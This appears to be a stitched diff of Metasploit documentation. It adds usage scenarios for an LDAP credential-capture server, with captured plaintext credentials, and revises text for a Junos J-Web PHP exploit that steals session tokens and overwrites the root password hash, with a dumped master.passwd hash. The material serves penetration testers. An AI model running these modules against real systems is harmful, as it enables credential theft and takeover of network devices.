+
+## Scenarios
+
+### Metasploit Server
+
+```
+msf6 > use auxiliary/server/capture/ldap
+msf6 auxiliary(server/capture/ldap) > run
+
+[*] Server started.
+[+] LDAP Login attempt => From:10.0.2.15:48198 Username:User Password:Pass
+```
+
+### Client
+
+```
+└─$ ldapsearch -LLL -H ldap://10.0.2.15 -D cn=User,dc=example,dc=com -W
+Enter LDAP Password: 
+ldap_bind: Auth Method Not Supported (7)
+        additional info: Auth Method Not Supported
+```
+
+**Database**
+
+```
+msf6 auxiliary(server/capture/ldap) > creds
+Credentials
+===========
+
+host       origin     service         public  private  realm        private_type  JtR Format
+----       ------     -------         ------  -------  -----        ------------  ----------
+10.0.2.15  10.0.2.15  389/tcp (ldap)  User    Pass     example.com  Password      
+```
@@ -36,11 +36,11 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 `allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
 `data://` to provide a file inline which includes the base64 encoded PHP payload.

-By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
-datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
-to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
-to the J-Web application this method will not work. The module then authenticates with the new root password over
-SSH and then rewrites the original root password hash to /etc/master.passwd.
+By default this exploit returns a session confined to a FreeBSD jail with limited functionality when using the
+`PHP In-Memory target`. When using the `Interactive SSH with jail break` target the module will steal the necessary
+tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If there is no
+user authenticated to the J-Web application the module will create one. The module then authenticates with the new root
+password over SSH and then rewrites the original root password hash to /etc/master.passwd.

 ### Setup

@@ -144,7 +144,7 @@ Meterpreter : php/freebsd
 meterpreter > exit
 ```

-### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive SSH with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 ```
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets

@@ -233,4 +233,4 @@ bind:*:53:53::0:0:Bind Sandbox:/:/sbin/nologin
 uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
 admin:$6$Dj.crXwf$EyAmqaJz7f3.JldkbZk7eZuApofQ7zK/z/7Q5ntrD3cebxYc9/Y2FSoJcUIZSgYwKGGyd0nnfNSvaHzkz6BLL1:2000:20:j-super-user:0:0:Administrator:/var/home/admin:/usr/sbin/cli
-```
+```
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.5
 .1.5